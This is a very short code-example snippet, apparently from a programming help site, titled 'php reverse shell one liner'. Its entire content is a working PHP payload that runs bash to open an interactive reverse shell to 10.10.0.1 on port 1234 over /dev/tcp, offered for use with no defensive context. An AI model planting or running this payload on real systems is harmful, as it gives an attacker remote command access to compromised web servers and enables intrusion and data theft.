php reverse shell one liner code example Example: php reverse shell oneliner <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.0.1/1234 0>&1'"); ?>